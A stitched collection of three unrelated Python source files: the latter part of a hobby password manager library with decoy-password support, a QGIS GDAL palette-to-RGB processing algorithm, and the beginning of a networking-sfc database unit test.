stop = 0
for i, c in enumerate(line):
if c not in '\t ':
stop = i
trailfree.append(line[:stop + 1])
del nonblanks
# Calculate indentation.
final = []
for line in trailfree:
indent = 0
for i, c in enumerate(line):
if c == ' ':
indent += 1
elif c == '\t':
indent += 8 - indent%8
else:
break
final.append((indent, line[i:]))
return final
def parsetext_list(text_list, *args):
'''
This is used by `parse_text`.
In `parse_text`:
``return parsetext_list(text_list, *args)``
'''
ret = []
list_item = []
dict_item = {}
normal_indent = None
while True:
# Get line.
try:
indent, line = text_list.pop(0)
except IndexError:
return ret
if normal_indent is None:
normal_indent = indent
if indent != normal_indent:
text_list.insert(0, (indent, line))
if indent > normal_indent:
list_item.append(parsetext_list(text_list))
continue
if indent < normal_indent:
return ret
# Next item in list.
if line[0] == '%':
if dict_item and list_item:
raise SyntaxError('dict and list hybrid not invented\n' +
'You are not expected to understand this:' +
' len(ret), indent = {0}, {1}'.format(len(ret), indent))
if list_item:
ret.append(list_item)
else:
ret.append(dict_item)
list_item = []
dict_item = {}
continue
# dict or list?
allowed = ''.join([
''.join([chr(x) for x in range(ord('0'), ord('9') + 1)]),
''.join([chr(x) for x in range(ord('A'), ord('Z') + 1)]),
''.join([chr(x) for x in range(ord('a'), ord('z') + 1)]),
'-_'
])
for c in line:
if c == ':':
# dict
break
if c not in allowed:
# list.
break
if c == ':':
key, value = line.split(':', 1)
if value:
dict_item[key] = parsetext_getvalue(value, *args)
else:
# value is a list.
try:
a, b = text_list.pop(0)
except IndexError:
raise SyntaxError(
'{0}: Expected a list, got an ^D'.format(key))
if not a > indent:
raise SyntaxError("{0}: The list isn't indented".format(
key))
text_list.insert(0, (a, b))
dict_item[key] = parsetext_list(text_list, *args)
else:
list_item.append(parsetext_getvalue(line, *args))
def parse_text(inp, *args):
'''
parse_text(text, *args)
Return a list of dicts from text.
The format is based on Stanza and Python.
args are dicts like locals() and globals().
\t \n \' \" \\ and backslash-newline.
Triple strings.
Note: SyntaxError()s are often caused by off-by-one errors and
small unnoticeable characters.
It works recursively with indention. parse_text returns
and recurses when the indention decreases and increases.
# Indent properly
blah
blah
%
blah
%
%
#[[blah, [[blah]], [[blah]]]]
main:
[
[stuff], If no key: value
{stuff}, If only key: value
{} If empty
SyntaxError If mixed.
]
Indented stuff in a list or a dict will have a `main`.
'str'
'Hello world!'
'Good bye cruel world!'
%
'!dlrow olleH'
'!dlrow leurc eyb dooG'
%
%
key: 'value'
stuff:
key: value
number: 88
%
'alpha'
'beta'
%
%
# Will return:
[
[
'str',
[
[
'Hello world!',
'Good bye cruel world!'
],
[
'!dlrow olleH',
'!dlrow leurc eyb dooG'
]
]
],
{
'key': 'value',
'stuff': [
{
'key': 'value',
'number': 88
},
[
'alpha',
'beta
]
]
}
]
'''
args = list(args)
args.append({
'True': True,
'False': False,
'None': None
})
args = tuple(args)
text_list = parsetext_untext(inp)
try:
return parsetext_list(text_list, *args)
except SyntaxError as e:
raise SyntaxError(
'From parse_text:\n{0}\nIndent:{1}\nLine:{2}'.format(
e, *text_list[0]))
class common_data():
"""class common_data():
`xmlfile` is a path.
All classes based on common_data are list-like with legs.
__init__(self, xmlfile, make_backups=True)
Variables
---------
self.index integer; __iter__ and __next__
self.data list
self.xmltree `xmlfile` is loaded into this.
self.xmlroot The <root> tag.
self.make_backups bool; will `writexml` generate a backup
in '~/.skogpasswdman/undoable/'.
Methods
-------
__iter__
__getitem__
__next__ = next
remove(x, xmlfile, element_name, attrib_name, is_numstring)
writexml(xmlfile, pb=None)
"""
def __init__(self, xmlfile, make_backups=True):
"""__init__(self, xmlfile)
This function is called by passwd.__init__ and honeypot.__init__ and
creates variables they both have. It loads them from the
path xmlfile -> self.xmltree -> self.xmlroot.
"""
# ~/.skogpasswdman/passwords or ~/.skogpasswdman/honeypots
assert is_anystr(xmlfile)
self.data = []
self.index = 0
self.make_backups = make_backups
try:
parser = XML.XMLParser(encoding="UTF-8")
except:
parser = XML.XMLParser() # Above will fail with Python 2.6.
self.xmltree = XML.parse(ope(xmlfile), parser)
self.xmlroot = self.xmltree.getroot()
# Sanity checking...
# Root tag.
if self.xmlroot.tag != "root":
raise err_loaderr(
"root element is not 'root' in '{0}'".format(xmlfile))
# Magic.
if not self.xmlroot.attrib["magic"] in ("skogpasswdman", "passwdman"):
raise err_loaderr("incorrect magic in '{0}'".format(xmlfile))
# Version.
version = self.xmlroot.attrib["version"].split('.', 2)
if int(version[0]) != 0:
raise err_loaderr("version too new in '{0}'".format(xmlfile))
if int(version[1]) > 1:
logging.warning("High version number '{0}' in '{1}'".format(
self.xmlroot.attrib["version"], xmlfile))
# Passwords/honey pots.
# The attribute "file" should have the value <basename of xmlfile>.
if self.xmlroot.attrib["file"] != os.path.basename(xmlfile):
raise err_loaderr("incorrect file magic in '{0}'".format(xmlfile))
logging.info("'{0}' is successfully loaded".format(xmlfile))
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self.data):
self.index += 1
return self.data[self.index - 1]
else:
raise StopIteration
def next(self):
return self.__next__()
def __getitem__(self, i):
return self.data[i]
def __len__(self):
return len(self.data)
def remove(self, x, xmlfile, element_name, attrib_name, is_numstring):
"""remove(self, x, xmlfile, element_name, attrib_name, is_numstring)
`x` is an integer used as an index xor a string. It can also be
a stringed integer.
It removes `x` from the file `xmlfile` and `self.data`.
It looks for a match in self.xmltree in the attribute
`attrib_name` in the tags `element_name`
.
is_numstring == True:
`x` is a string of digits, not an integer.
Set is_numstring to True if `x` is NOT an index!
Raises err_notfound.
Example (from passwd.remove)
----------------------------
common_data.remove(self, x, "~/.skogpasswdman/passwords", "passwd",
"name", is_numstring)
"""
assert is_anystr(attrib_name) and is_anystr(element_name)
assert is_anystr(xmlfile)
if not is_numstring:
try:
x = int(x) # Is it a stringed integer?
except:
pass
if is_int(x):
y = 0
for z in self.xmlroot.findall(element_name):
# Loop through the XML.
if x == y: # y is the index.
del self.data[y]
self.xmlroot.remove(z)
common_data.writexml(self, xmlfile)
return
else:
y += 1 # Try next.
raise err_notfound("Not found.")
elif is_unicodestr(x):
y = 0
for z in self.xmlroot.findall(element_name):
# Loop through the XML
if z.attrib[attrib_name] == x: # Check for a match.
del self.data[y]
self.xmlroot.remove(z)
common_data.writexml(self, xmlfile)
return
else:
y += 1
raise err_notfound("not found")
else:
raise err_notfound("not integer and not unicode-string")
def writexml(self, xmlfile, pb=None):
"""writexml(self, xmlfile)
Write the XML tree (self.xmltree) to `xmlfile`.
It will add a backup to '~/.skogpasswdman/undoable/' if
`self.make_backups` is True."""
assert is_anystr(xmlfile)
self.xmlroot.text = "\n " # Make it look better.
self.xmlroot.tail = "\n"
if self.make_backups:
# Make backup.
os.rename(ope(xmlfile),
os.path.join(ope("~/.skogpasswdman/undoable"),
os.path.basename(xmlfile) + '-' + time.ctime()))
if pb is not None:
pb.progress(50.0)
try:
self.xmltree.write(ope(xmlfile), encoding="UTF-8",
xml_declaration=True)
except: # For Python 2.6.
self.xmltree.write(ope(xmlfile), encoding="UTF-8")
if pb is not None:
pb.progress(100.0)
def __del__(self):
"""Used by undo() and redo(). Make sure the object is 0xdeadbeef."""
del self.data
del self.index
del self.xmlroot
del self.xmltree
def __repr__(self):
return "<skogpasswdmanapi.common_data object with id {0}>".format(
id(self))
class passwd(common_data):
"""passwd(common_data) - The passwords.
All classes based on common_data are list-like with legs.
__init__(self, backups=True)
With `backups`=True changes can be undone.
Methods (including those from common_data)
------------------------------------------
add(name, value, m_type, m_minlength, m_maxlength, pb=None)
add_nometa(name, value)
remove(x, is_numstring=False)
mkindex(x, is_numstring=False)
update(index, pb=None)
update_meta(index, m_type, m_minlength, m_maxlength, pb=None)
__iter__
next = __next__
__len__
__getitem__
`passwd`'s entries are dicts
----------------------------
- 'name' What is the password for.
- 'value' The password.
- 'meta' A dict inside a dict. The keys are needed for
(re)`randomize`ing the password. See `add` and
`update` The password's meta-data.
- 'minlength' Minimal required length for the
password. Use int() on this.
- 'maxlength' Maximal allowed length for the
password. Use int() on this.
- 'type' String; Allowed characters in the
password. For :method:`update`.
- '10' Digits only.
- '64' A-Z, a-z, '_', '!'
- 'human' It was human-generated. The
password should have 0 as
minlength and maxlength.
Internals
---------
xmltree A 'xml.etree.ElementTree.ElementTree'.
xmlroot A 'xml.etree.ElementTree.Element'. The 'root' tag.
writexml() Not so well hidden method inherited from common_data.
"""
def __init__(self, backups=True):
common_data.__init__(self, "~/.skogpasswdman/passwords", backups)
for passwd_element in self.xmlroot.findall("passwd"): # Get the data.
meta_element = passwd_element.find("meta")
# Got the tags/elements.
if meta_element is not None:
meta_attrib = {
"minlength": int(meta_element.attrib["minlength"]),
"maxlength": int(meta_element.attrib["maxlength"]),
"type": meta_element.attrib["type"]
}
else:
# The meta tag is optional.
# This is the magic dictionary.
meta_attrib = {
"minlength": 0,
"maxlength": 0,
"type": "human"
}
# Got the meta attributes.
self.data.append({
"name": passwd_element.attrib["name"],
"value": passwd_element.attrib["value"],
"meta": meta_attrib
})
def add(self, name, value, m_type, m_minlength, m_maxlength, pb=None):
assert is_unicodestr(name)
assert is_unicodestr(value) or value is None
assert is_anystr(m_type)
"""add(self, name, value, m_type, m_minlength, m_maxlength)
Add the password for `name` with the value `value`. If `value`
is None then the password will be `randomize`d.
`m_type`
------
- "human" The password is some human generated password.
Cannot be `randomize`d.
- "10" It only contains digits.
- "64" It contains A-Z, a-z, 0-9, underscore and
exclamation mark.
`m_minlength` is the minimum length required for the password.
`m_maxlength` is the maximum length allowed for the password.
Raises err_duplicate if the password for `name` already exist.
"""
if is_int(m_minlength):
m_minlength = str(m_minlength)
if is_int(m_maxlength):
m_maxlength = str(m_maxlength)
assert is_anystr(m_minlength) and is_anystr(m_maxlength)
forget = int(m_minlength) # Raise an exception if not a number.
forget = int(m_maxlength) # Raise an exception if not a number.
if pb is None:
pb = no_pb()
for x in self.data: # Check for duplicates.
if x["name"] == name:
raise err_duplicate(
"passwd.add_nometa(name='{0}') #duplicate".format(value))
pb.progress(5.0)
if value is None:
value = randomize(m_type, int(m_minlength), int(m_maxlength),
pb.minibar(5.0, 90.0))
self.data.append({
"name": name,
"value": value,
"meta": {
"type": m_type,
"minlength": m_minlength,
"maxlength": m_maxlength
}
})
# Add new tags.
passwd_element = XML.SubElement(self.xmlroot, "passwd")
passwd_element.text = "\n " # Make them look better.
passwd_element.tail = "\n "
meta_element = XML.SubElement(passwd_element, "meta")
meta_element.tail = "\n "
# Attributes.
passwd_element.set("name", name)
passwd_element.set("value", value)
meta_element.set("type", m_type)
meta_element.set("minlength", m_minlength)
meta_element.set("maxlength", m_maxlength)
pb.progress(95.0)
common_data.writexml(self, "~/.skogpasswdman/passwords")
pb.progress(100.0)
def add_nometa(self, name, value):
"""add_nometa(self, name, value)
``self.add(name, value, "human", 0, 0)``
Add a password without meta-data.
"""
assert is_unicodestr(name) and is_unicodestr(value)
for x in self.data: # Check for duplicates.
if x["name"] == name:
raise err_duplicate(
"passwd.add_nometa(name='{0}') #duplicate".format(value))
self.data.append({
"name": name,
"value": value,
"meta": {
"type": "human",
"minlength": 0,
"maxlength": 0
}
})
passwd_element = XML.SubElement(self.xmlroot, "passwd")
passwd_element.tail = "\n "
passwd_element.set("name", name) #Attributes.
passwd_element.set("value", value)
common_data.writexml(self, "~/.skogpasswdman/passwords")
def remove(self, x, is_numstring=False):
"""remove(self, x, is_numstring=False)
Remove the password `x`.
`x` is an integer used as an index for `self.data` xor a string
xor a stringed integer (index).
`x` is what the password is for, not the value.
Set is_numstring to True if x is a string containing only
digits, but is NOT an index!
"""
common_data.remove(self, x, "~/.skogpasswdman/passwords", "passwd",
"name", is_numstring)
def mkindex(self, x, is_numstring=False):
"""mkindex(self, x, is_numstring=False)
Return the index of the password for `x`.
`x` is either an integer=index, a string to find xor a stringed
integer.
Set is_numstring to True if x is a string containing only
digits, but is NOT an index!
"""
index = 0
try:
if not is_numstring:
index = int(x) # That was very simple.
else:
raise
except:
assert is_unicodestr(x)
for y in self: # Find it.
if y["name"] == x:
return index
index += 1
raise err_notfound("")
return index
def update(self, index, pb=None):
"""update(self, index)
Update the password at index, use its meta-data to know how.
"""
assert is_int(index)
if index >= len(self) or index < 0:
raise err_notfound("index out of range")
try:
minlength = int(self[index]['meta']['minlength'])
maxlength = int(self[index]['meta']['maxlength'])
except:
raise err_idiot("INTEGERS")
method = self[index]["meta"]["type"]
if method == "human": # It would probably work with get64, but
raise err_nometa( # it will need a check for a meta-element and
# might need to create one.
# Use update_meta() to force specific meta-data.
"Don't know how to update a human-generated password.")
if pb is None:
pb = no_pb()
new = self[index]["value"] = randomize(method, minlength, maxlength,
pb.minibar(0.0, 90.0))
# Write the new password to the passwd file.
counter = 0
for element in self.xmlroot.findall("passwd"):
if counter == index: #Incremented enough?
element.set("value", new)
break
counter += 1
pb.progress(90.0 + (counter+1.0) / (index+1.0) * 5.0)
common_data.writexml(self, "~/.skogpasswdman/passwords",
pb.minibar(95.0, 100.0))
def update_meta(self, index, m_type, m_minlength, m_maxlength, pb=None):
"""update_meta(self, index, m_type, m_minlength, m_maxlength)
Update the password at index and its meta data.
"""
assert is_anystr(m_type)
assert is_int(index)
if index >= len(self) or index < 0:
raise err_notfound("index out of range")
try:
minlength = int(m_minlength)
maxlength = int(m_maxlength)
except:
raise err_idiot("INTEGERS")
if pb is None:
pb = no_pb()
new = self[index]["value"] = randomize(m_type, minlength, maxlength,
pb.minibar(0.0, 90.0))
self[index]["meta"]["type"] = m_type
self[index]["meta"]["minlength"] = m_minlength
self[index]["meta"]["maxlength"] = m_maxlength
# Write to the passwd file.
counter = 0
for element in self.xmlroot.findall("passwd"):
if counter == index: # Incremented enough?
element.set("value", new)
# Check meta.
meta = element.find("meta")
if meta is not None:
element.remove(meta)
# Create meta.
meta = XML.SubElement(element, "meta")
meta.set("type", m_type)
meta.set("minlength", str(m_minlength))
meta.set("maxlength", str(m_maxlength))
break
counter += 1
pb.progress(90.0 + (counter+1.0) / (index+1.0) * 5.0)
common_data.writexml(self, "~/.skogpasswdman/passwords",
pb.minibar(95.0, 100.0))
def __repr__(self):
return "<skogpasswdmanapi.passwd object with id {0}>".format(id(self))
class honeypot(common_data):
"""honeypot(common_data) - The honeypots.
All classes based on common_data are list-like with legs.
__init__(self, backups=True)
With `backups`=True changes can be undone.
Methods (including those from common_data)
------------------------------------------
add(value)
pick(n=1, sep=",", log_vs_raise=True, pb=None)
pickl(n, log_vs_raise=True, pb=None)
__iter__
next = __next__
__len__
__getitem__
A `honeypot`-object is list of strings.
Internals
---------
xmltree A 'xml.etree.ElementTree.ElementTree'.
xmlroot A 'xml.etree.ElementTree.Element'. The 'root' tag.
writexml() Not so well hidden method inherited from common_data.
"""
def __init__(self, backups=True):
"""__init__(self, backups=True)
Load ~/.skogpasswdman/honeypots -> self.xmltree
-> self.xmlroot -> self.data[].
self.data is a list of strings.
"""
common_data.__init__(self, "~/.skogpasswdman/honeypots", backups)
for honeypot_element in self.xmlroot.findall("honeypot"):
self.data.append(honeypot_element.attrib["value"])
def add(self, value):
assert is_unicodestr(value)
"""add(self, value) - Add a new honey pot with the value <value>."""
for x in self.data: # Check for duplicates.
if x == value:
raise err_duplicate(
"honeypot.add(value='{0}') #duplicate".format(value))
self.data.append(value)
honeypot_element = XML.SubElement(self.xmlroot, "honeypot")
honeypot_element.tail = "\n " # Make it look better.
honeypot_element.set("value", value)
common_data.writexml(self, "~/.skogpasswdman/honeypots")
def remove(self, x, is_numstring=False):
"""remove(self, x, is_numstring=False) - Remove an existing honey pot.
x is an integer used as index for self.data xor a string.
Set is_numstring to True if x is NOT an index!
"""
common_data.remove(self, x, "~/.skogpasswdman/honeypots", "honeypot",
"value", is_numstring)
assert not (_OLD_PICK_ and _NEW_PICK_), "Which pick?"
if _OLD_PICK_:
def pick(self, n=1, sep=",", log_vs_raise=True, pb=None):
"""pick(self, n=1, sep=",", log_vs_raise=True)
Pick `n` randomly selected honey-pots and separate them with
`sep`.
If `log_vs_raise` is True then `pick` will log an error if `n`
is too big. It will pick fewer fake-passwords than it is
supposed to.
If `log_vs_raise` is False it will raise `err_idiot`.
"""
assert is_unicodestr(sep) or sep == ","
# Its default is not unicode on Python 2.x.
return sep.join(self.pickl(n, log_vs_raise=log_vs_raise, pb=pb))
if _NEW_PICK_:
def pick(self, n=1, pb=None, **pickf_arg):
'''pick(self, n=1, pb=None, **pickf_arg)
Pick `n` randomly selected honey-pots.
If `pickf_arg` is not empty:
See `honeypot.pickf`.
Elif `n` is one:
This will return a string.
Else:
See `honeypot.pickl`.
'''
# pickf().
if pickf_arg:
return self.pickf(n, pb=pb, log_vs_raise=False, **pickf_arg)
# Single.
if n == 1:
return self.pickl(1, log_vs_raise=False, pb=pb)[0]
# Many.
return self.pickl(n, log_vs_raise=False, pb=pb)
def pickl(self, n, log_vs_raise=True, pb=None):
"""pickl(self, n, log_vs_raise=True)
Pick `n` randomly selected honey-pots and return a list.
If `log_vs_raise` is True then `pick` will log an error if `n`
is too big. It will pick fewer fake-passwords than it is
supposed to.
If `log_vs_raise` is False it will raise `err_idiot`.
"""
assert is_int(n)
if pb is None:
pb = no_pb()
if n > len(self):
n = len(self)
if log_vs_raise:
logging.error("honeypot.pick: <n> is too big.")
else:
raise err_idiot("n is too big!")
balloons, outlist, output = [], [], ""
for x in self: # Create popable list.
balloons.append(x)
while len(outlist) < n: # Pop random balloons.
s = float(len(outlist))
N = float(n)
outlist.append(balloons.pop(getint(0, len(balloons),
pb.minibar(s/N* 100.0, (s+1.0)/N * 100.0))))
return outlist
def pickf(self, n, **arg):
"""pickf(self, n,
pb = None,
pattern = "(['])",
replacement = r'\\\1',
sep = "', '",
head = "'",
tail = "'",
log_vs_raise = True
)
Pick `n` randomly selected honey-pots and return a string.
The string is prepended with `head` and appended with `tail`.
The honeypots are escaped with the regular expressions
`pattern` and `replacement`, and separated with `sep`.
If `log_vs_raise` is True then `pick` will log an error if `n`
is too big. It will pick fewer fake-passwords than it is
supposed to.
If `log_vs_raise` is False it will raise `err_idiot`.
"""
assert is_int(n)
defaults = {
'pb': None,
'pattern': r"(['\\])",
'replacement': r'\\\1',
'sep': "', '",
'head': "'",
'tail': "'",
'log_vs_raise': True
}
# Set to defaults if necessary.
for key in defaults:
try:
forget = arg[key]
except KeyError:
arg[key] = defaults[key]
# Unicode, usability.
for key in arg:
if key not in ('pb', 'log_vs_raise'):
arg[key] = u(arg[key])
try:
forget = defaults[key]
except KeyError:
raise err_idiot('Unknown keyword argument: {0}'.format(key))
# pb.
if arg['pb'] is None:
arg['pb'] = no_pb()
# Escape some bad characters.
escaped = []
for x in self.pickl(n, pb=arg['pb']):
escaped.append(re.sub(arg['pattern'], arg['replacement'], x))
# Return.
return arg['head'] + arg['sep'].join(escaped) + arg['tail']
def __repr__(self):
return "<skogpasswdmanapi.honeypot object with id {0}>".format(id(self))
def _unredo(passwdobj, honeypotobj, undo_unodable, undo_redoable):
"""_unredo(passwdobj=None, honeypotobj=None,
undo_unodable, undo_redoable)
`passwdobj` and `honeypotobj` are the passwd and honeypot OBJECTS.
Moves '~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots' to
`undo_redoable`.
Moves the newest file from `undo_unodable` to
'~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots'.
"""
time.sleep(1) # Prevent overwriting historyfiles.
if not isinstance(passwdobj, passwd):
raise err_idiot("Read the fucking __doc__ string")
if not isinstance(honeypotobj, honeypot):
raise err_idiot("Read the fucking __doc__ string")
filename, birth = "", 0
for x in os.listdir(ope(undo_unodable)):
y = os.stat(os.path.join(ope(undo_unodable), x))
if y.st_ctime > birth: # Newer file.
del filename
filename = os.path.join(ope(undo_unodable), x)
# Update filename to the newer file.
birth = y.st_ctime # Increase birth.
del birth
# Filename is now the name of the file.
if "passwords" in filename:
os.rename(ope("~/.skogpasswdman/passwords"),
os.path.join(ope(undo_redoable),
"passwords" + '-' + str(time.time()))) # Copy to redoable.
passwdobj.__del__()
os.rename(filename, ope("~/.skogpasswdman/passwords"))
passwdobj.__init__() # Reload the data structure.
elif "honeypots" in filename:
os.rename(ope("~/.skogpasswdman/honeypots"),
os.path.join(ope(undo_redoable),
"honeypots" + '-' + str(time.time()))) # Copy to redoable.
honeypotobj.__del__()
os.rename(filename, ope("~/.skogpasswdman/honeypots"))
honeypotobj.__init__() # Reload the data structure.
else:
logging.error("function undo in module skogpasswdmanapi:" +
"confused by the file '{0}'".format(filename))
def undo(passwdobj=None, honeypotobj=None):
"""undo(passwdobj=None, honeypotobj=None)
It's arguments are the passwd and honeypot OBJECTS.
Moves '~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots' to
'~/.skogpasswdman/redoable/*'.
Moves the newest file from '~/.skogpasswdman/undoable/*' to
'~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots'.
"""
_unredo(passwdobj, honeypotobj, "~/.skogpasswdman/undoable",
"~/.skogpasswdman/redoable")
def redo(passwdobj=None, honeypotobj=None):
"""redo(passwdobj=None, honeypotobj=None)
It's arguments are the passwd and honeypot OBJECTS.
Moves '~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots' to
'~/.skogpasswdman/undoable/*'.
Moves the newest file from '~/.skogpasswdman/redoable/*' to
'~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots'.
"""
_unredo(passwdobj, honeypotobj, "~/.skogpasswdman/redoable",
"~/.skogpasswdman/undoable")
# Run this when imported.
assert __name__ != "__main__"
def ckmkdir(x):
"""ckmkdir(x) - make sure that the directory `x` exists."""
try:
os.stat(ope(x))
except OSError:
os.mkdir(ope(x), 0o700)
def ckmkfile(x, y):
"""ckmkfile(x, y) - make sure that the file `x` exists.
Its default content is `y`.
"""
try:
os.stat(ope(x))
except OSError:
f = open(ope(x), "w")
f.write(y)
f.close()
# Make sure all the needed files exist.
# ckmkdir("~/.skogpasswdman")
try:
os.stat(ope('~/.skogpasswdman'))
except OSError:
try:
os.stat(ope('~/.passwdman')) # Check for old name.
try:
os.symlink(ope('~/.passwdman'), ope('~/.skogpasswdman'))
except OSError as x:
raise Exception('OSError', x) # Oops
except OSError:
os.mkdir(ope('~/.skogpasswdman'), 0o700) # New install.
ckmkdir("~/.skogpasswdman/undoable")
ckmkdir("~/.skogpasswdman/redoable")
ckmkfile("~/.skogpasswdman/passwords", """<?xml version='1.0' encoding='UTF-8'?>
<root file="passwords" magic="skogpasswdman" version="0.1">
</root>
""")
ckmkfile("~/.skogpasswdman/honeypots", """<?xml version='1.0' encoding='UTF-8'?>
<root file="honeypots" magic="skogpasswdman" version="0.1">
</root>
""")
# Simple exclusive lock for all the files.
ckmkfile("~/.skogpasswdman/lock", "")
f = open(ope("~/.skogpasswdman/lock"), 'w')
try:
fcntl.lockf(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
raise err_loaderr('Another skogpasswdman* is running!')
try:
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
except:
logging.error("Cannot figure out encoding.")
code = 'ascii'
|
radosuav/QGIS | refs/heads/master | python/plugins/processing/algs/gdal/pct2rgb.py | 15 | # -*- coding: utf-8 -*-
"""
***************************************************************************
pct2rgb.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
import os
from qgis.PyQt.QtGui import QIcon
from qgis.core import (QgsRasterFileWriter,
QgsProcessingException,
QgsProcessingParameterRasterLayer,
QgsProcessingParameterBand,
QgsProcessingParameterBoolean,
QgsProcessingParameterRasterDestination)
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.tools.system import isWindows
from processing.algs.gdal.GdalUtils import GdalUtils
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class pct2rgb(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
RGBA = 'RGBA'
OUTPUT = 'OUTPUT'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterRasterLayer(self.INPUT, self.tr('Input layer')))
self.addParameter(QgsProcessingParameterBand(self.BAND,
self.tr('Band number'),
1,
parentLayerParameterName=self.INPUT))
self.addParameter(QgsProcessingParameterBoolean(self.RGBA,
self.tr('Generate a RGBA file'),
defaultValue=False))
self.addParameter(QgsProcessingParameterRasterDestination(self.OUTPUT, self.tr('PCT to RGB')))
def name(self):
return 'pcttorgb'
def displayName(self):
return self.tr('PCT to RGB')
def group(self):
return self.tr('Raster conversion')
def groupId(self):
return 'rasterconversion'
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'gdaltools', '8-to-24-bits.png'))
def commandName(self):
return 'pct2rgb'
def getConsoleCommands(self, parameters, context, feedback, executing=True):
arguments = []
inLayer = self.parameterAsRasterLayer(parameters, self.INPUT, context)
if inLayer is None:
raise QgsProcessingException(self.invalidRasterError(parameters, self.INPUT))
arguments.append(inLayer.source())
out = self.parameterAsOutputLayer(parameters, self.OUTPUT, context)
self.setOutputValue(self.OUTPUT, out)
arguments.append(out)
arguments.append('-of')
arguments.append(QgsRasterFileWriter.driverForExtension(os.path.splitext(out)[1]))
arguments.append('-b')
arguments.append(str(self.parameterAsInt(parameters, self.BAND, context)))
if self.parameterAsBoolean(parameters, self.RGBA, context):
arguments.append('-rgba')
if isWindows():
commands = ["python3", "-m", self.commandName()]
else:
commands = [self.commandName() + '.py']
commands.append(GdalUtils.escapeAndJoin(arguments))
return commands
|
openstack/networking-sfc | refs/heads/master | networking_sfc/tests/unit/db/test_sfc_db.py | 1 | # Copyright 2017 Futurewei. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import logging
from unittest import mock
from neutron.api import extensions as api_ext
from neutron.common import config
import neutron.extensions as nextensions
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import uuidutils
import webob.exc
from networking_sfc.db import flowclassifier_db as fdb
from networking_sfc.db import sfc_db
from networking_sfc import extensions
from networking_sfc.extensions import flowclassifier as fc_ext
from networking_sfc.extensions import servicegraph as sg_ext
from networking_sfc.extensions import sfc
from networking_sfc.extensions import tap as tap_ext
from networking_sfc.tests import base
from networking_sfc.tests.unit.db import test_flowclassifier_db
DB_SFC_PLUGIN_CLASS = (
"networking_sfc.db.sfc_db.SfcDbPlugin"
)
extensions_path = ':'.join(extensions.__path__ + nextensions.__path__)
class SfcDbPluginTestCaseBase(
base.BaseTestCase
):
def _assert_port_chain_equal(self, res_port_chain, expected):
# Flow classifiers are stored in a list, only check items for them
for k, v in expected.items():
if type(v) is list:
self.assertCountEqual(res_port_chain[k], v)
else:
self.assertEqual(res_port_chain[k], v)
def _create_port_chain(
self, fmt, port_chain=None, expected_res_status=None, **kwargs
):
ctx = kwargs.get('context', None)
tenant_id = kwargs.get('tenant_id', self._tenant_id)
data = {'port_chain': port_chain or {}}
if ctx is None:
data['port_chain'].update({'tenant_id': tenant_id})
req = self.new_create_request(
'port_chains', data, fmt, context=ctx
)
res = req.get_response(self.ext_api)
if expected_res_status:
self.assertEqual(expected_res_status, res.status_int)
return res
@contextlib.contextmanager
def port_chain(self, fmt=None, port_chain=None, do_delete=True, **kwargs):
if not fmt:
fmt = self.fmt
res = self._create_port_chain(fmt, port_chain, **kwargs)
if res.status_int >= 400:
logging.error('create port chain result: %s', res)
raise webob.exc.HTTPClientError(code=res.status_int)
port_chain = self.deserialize(fmt or self.fmt, res)
yield port_chain
if do_delete:
self._delete('port_chains', port_chain['port_chain']['id'])
def _create_port_pair_group(
self, fmt, port_pair_group=None, expected_res_status=None, **kwargs
):
ctx = kwargs.get('context', None)
tenant_id = kwargs.get('tenant_id', self._tenant_id)
data = {'port_pair_group': port_pair_group or {}}
if ctx is None:
data['port_pair_group'].update({'tenant_id': tenant_id})
req = self.new_create_request(
'port_pair_groups', data, fmt, context=ctx
)
res = req.get_response(self.ext_api)
if expected_res_status:
self.assertEqual(expected_res_status, res.status_int)
return res
@contextlib.contextmanager
def port_pair_group(
self, fmt=None, port_pair_group=None, do_delete=True, **kwargs
):
if not fmt:
fmt = self.fmt
res = self._create_port_pair_group(fmt, port_pair_group, **kwargs)
if res.status_int >= 400:
logging.error('create port pair group result: %s', res)
raise webob.exc.HTTPClientError(code=res.status_int)
port_pair_group = self.deserialize(fmt or self.fmt, res)
yield port_pair_group
if do_delete:
self._delete(
'port_pair_groups',
port_pair_group['port_pair_group']['id'])
def _create_port_pair(
self, fmt, port_pair=None, expected_res_status=None, **kwargs
):
ctx = kwargs.get('context', None)
tenant_id = kwargs.get('tenant_id', self._tenant_id)
data = {'port_pair': port_pair or {}}
if ctx is None:
data['port_pair'].update({'tenant_id': tenant_id})
req = self.new_create_request(
'port_pairs', data, fmt, context=ctx
)
res = req.get_response(self.ext_api)
if expected_res_status:
self.assertEqual(expected_res_status, res.status_int)
return res
@contextlib.contextmanager
def port_pair(self, fmt=None, port_pair=None, do_delete=True, **kwargs):
if not fmt:
fmt = self.fmt
res = self._create_port_pair(fmt, port_pair, **kwargs)
if res.status_int >= 400:
logging.error('create port pair result: %s', res)
raise webob.exc.HTTPClientError(code=res.status_int)
